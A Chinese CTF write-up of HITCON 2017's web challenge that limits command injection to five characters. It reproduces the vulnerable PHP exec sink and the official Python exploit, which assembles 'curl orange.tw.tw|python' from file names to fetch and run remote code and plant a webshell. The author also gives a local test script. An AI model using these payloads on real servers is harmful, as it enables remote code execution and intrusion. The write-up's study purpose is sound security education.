前幾天做了一道HITCON2017的web題目硫豆,與朋友交流之后熊响,有了一點思路,奈何最后還是沒有成功解出這題汗茄。在writeup出來后,在復(fù)現(xiàn)的過程中遇到了一些問題递览,記錄一下。
題目的源碼:index.php
<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
大致題目的意思就是镜雨,當(dāng)你在GET參數(shù)cmd的時候限制了字符的長度為5儿捧,思路就是要想辦法繞過這個限制來獲得webshell
官方給出的exp:
import requests
from time import sleep
from urllib import quote
payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>-t\\',
'>\>g',
'ls>>_',
# generate `curl orange.tw.tw|python`
'>on',
'>th\\',
'>py\\',
'>\|\\',
'>tw\\',
'>e.\\',
'>ng\\',
'>ra\\',
'>o\\',
'>\ \\',
'>rl\\',
'>cu\\',
# exec
'sh _',
'sh g',
]
r = requests.get('http://52.199.204.34/?reset=1')
for i in payload:
assert len(i) <= 5
r = requests.get('http://52.199.204.34/?cmd=' + quote(i) )
print i
sleep(0.2)
由于我是在本地搭建的環(huán)境菲盾,不太清楚他的具體環(huán)境,只要演示通過這個index.php獲得一個webshell就行了懒鉴。
這個思路就是先想辦法通過ls命令疗我,構(gòu)造出包含 ls -t>g 這條命令的文件,然后再執(zhí)行它構(gòu)造出一個包含一句話木馬的webshell.
先參考這個文檔:
箭頭指向的那個字符串旧找,其實是<php? eval($_GET[1])的base64編碼麦牺,實際上最后執(zhí)行會base64解碼得到PHP一句話木馬。
回到之前的題目魏颓,要求的是cmd提交的參數(shù)長度小于等于5吱晒,為了實現(xiàn)更短的生成文件,我們使用>xxx的方式來生成一個名為xxx的文件叹话,而不是使用w>xxx墩瞳。
這個題目,由于最后要直接執(zhí)行ls -t>g這條命令的話喉酌,至少需要7位的長度,因此考慮先把
ls -t>g用同樣的方式把ls -t>g寫進一個文件般妙,然后使用sh命令執(zhí)行這個文件就可以代替ls -t>g的功能。
Exp中
# generate `ls -t>g` file
'>ls\\',
#因為ls命令顯示的文件順序是按名稱來排序的霹陡,‘ \’ 會排列在 ‘ls\’ 的前面止状,因此需要先把 'ls\'先寫入'_'這個文件,因此執(zhí)行下面這條命令
'ls>_',
#后面的順序浆洗,ls時默認是按照以下順序的集峦,因此可以直接輸入
'>\ \\',
'>-t\\',
'>\>g',
#最后執(zhí)行的這條命令,會附加到后面摘昌,正好與前面的 'ls\'結(jié)合到一起形成'ls -t>g'
'ls>>_',
這部分就是要完成這個功能高蜂。
重點來了,我們今天要談?wù)摰膯栴}就是與這個相關(guān)稿饰。
經(jīng)過實際的嘗試露泊,使用python腳本,把參數(shù)按照上面的順序post到webserver
執(zhí)行之后侣姆,確實在對應(yīng)的目錄下面生成了一個名為_的文件沉噩,這個文件的內(nèi)容為:
最后確實成功執(zhí)行了ls -t>g這個命令。
注:箭頭指向的 \ 實際是因為shell執(zhí)行換行的命令組合時,需要 \ 來進行轉(zhuǎn)義派歌,否則會單行順序執(zhí)行命令。
然而胶果,仔細看上面ls之后顯示的文件的排列順序,實際上在寫入'_'文件之后霎烙,生成的文件內(nèi)容不應(yīng)該是上面的樣子蕊连。
我實際在bash里面按順序執(zhí)行以下命令:
'>ls\\',
'ls>_',
'>\ \\',
'>\>g',
'>-t\\',
'ls>>_'
生成的_文件的內(nèi)容與通過exp腳本提交參數(shù)之后生成的不一樣甘苍,而用sh執(zhí)行之后也不能成功執(zhí)行ls -t>g的命令。
究其原因看彼,就是因為ls命令列目錄的時候囚聚,'_'和'>g'這兩個文件的順序在-t>這個文件的前面。因此沒有辦法成功的構(gòu)造出一個ls -t>g的命令茁计。
經(jīng)過在我的虛擬機上測試(kali 2.0和ubuntu 16.04)上面測試跋破,使用bash和sh兩個終端執(zhí)行的結(jié)果都是一樣的,無法成功構(gòu)造出ls -t>g
我原本以為可能是與exec函數(shù)有關(guān)毒返,但是實際直接在終端執(zhí)行php文件的話拧簸,構(gòu)造的結(jié)果還是與bash的一樣。
因此盆赤,我得出的一個結(jié)論:
通過webserver中間件 和直接在終端, 執(zhí)行l(wèi)s命令颤枪,得到的文件的列表的順序是不一樣的淑际。具體的原因暫時還不清楚扇住,希望能有大佬給我指教盗胀。感激不盡。
附:本地腳本測試的時候的index.php腳本和exp.py
<?php
$sandbox = '/var/www/html/sanbox/' . md5("orange" . $_SERVER['REMOTE_ADDR'])
;
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);
import requests
from time import sleep
from urllib import quote
payload = [
# generate `ls -t>g` file
'>ls\\',
'ls>_',
'>\ \\',
'>\>g',
'>-t\\',
'ls>>_'
]
r = requests.post('http://127.0.0.1/test/?reset=1')
for i in payload:
assert len(i) <= 5
r = requests.post('http://127.0.0.1/test/?cmd=' + quote(i) )
print i
sleep(0.2)
